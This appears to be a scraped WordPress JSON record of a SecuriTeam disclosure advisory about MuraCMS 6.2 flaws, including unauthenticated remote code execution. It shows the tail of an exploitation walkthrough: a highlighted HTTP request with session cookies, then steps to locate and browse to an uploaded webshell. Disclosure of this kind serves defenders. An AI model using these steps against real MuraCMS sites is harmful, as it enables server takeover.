class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb602794712843-7\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">it<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">IT<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">it<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.3<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb602794712843-8\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb602794712843-9\"><span class=\"crayon-i\">Page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">of<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">7<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb602794712843-10\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/192.168.0.101:8888\/admin\/?muraAction=cArch.edit&amp;contenthistid=E854D858-A5EF-46FAA8F5F7B343C93958&amp;siteid=default&amp;contentid=00000000000000000000000000000000001&amp;topid=00000000000000000000000000000000001&amp;type=Page&amp;parentid=00000000000000000000000000000000END&amp;moduleid=00000000000000000000000000000000000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb602794712843-11\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cfid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">f4d255c5<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">4789<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">420c<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">8a41<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">a925671b1ae0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cftoken<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb602794712843-12\"><span class=\"crayon-v\">ORIGINALURLTOKEN<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">A589BA35<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">0260<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">4163<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">BF03CCC534A9AFC7<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MOBILEFORMAT<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">false<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb602794712843-13\"><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">D06BAFB1A7DFCE934D82C6B804CD7AEE<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CKFinder_Path<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">default_Site_Files<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3A<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2Fcache<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2Ffile<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2F<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3A1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58b9ebe9cb602794712843-14\"><span class=\"crayon-v\">FETDISPLAY<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">REMEMBER<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SUBSCRIBE<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">NAME<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">EMAIL<\/span><span class=\"crayon-o\">=<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58b9ebe9cb602794712843-15\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">alive<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0033 seconds] -->  <\/p>\n<li>The red string is the name of our webshell renamed by the webapp<\/li>\n<li>Now it is possible to point the browser on <em>http:\/\/<url>\/ default\/cache\/file\/ABD5B173-790C-4973-991504D56A3DF2B5.cfm<\/url><\/em><\/li>\n<\/ol><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2955\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Fri, 03 Mar 2017 16:04:16 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes two (2) vulnerabilities found in MuraCMS version 6.2. MuraCMS is an open source content management system for CFML, created by Blue River Interactive Group. Mura has been designed to be used by marketing departments, web designers and developers. The vulnerabilities found in MuraCMS are: Unauthenticated remote arbitrary code execution &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2955\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 MuraCMS Multiple Vulnerabilities<\/span> <span class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757],"class_list":["post-6854","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6854","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6854"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6854\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6854"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6854"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6854"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}